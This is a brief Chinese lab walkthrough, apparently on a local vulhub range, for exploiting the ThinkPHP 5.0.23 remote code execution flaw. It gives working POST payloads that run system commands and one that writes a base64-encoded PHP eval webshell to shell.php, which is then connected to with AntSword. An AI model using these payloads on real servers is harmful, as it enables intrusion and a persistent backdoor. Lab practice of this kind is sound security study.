1.执行以下命令启动靶场环境并在浏览器访问
cd thinkphp/5.0.23-rce
docker-compose up -d
docker ps
2.访问网页172.16.1.26:8080
3.判断是否存在漏洞:访问/index.php?s=captcha页面,会出现如下报错
4.使用HackBar 插件发送 POST 请求
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=dir
5.通过echo命令写入 Webshell 文件,首先将一句话木马进行Base64 编码
6.发送POST 请求
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= | base64 -d > shell.php
7.访问shell.php,蚁剑连接
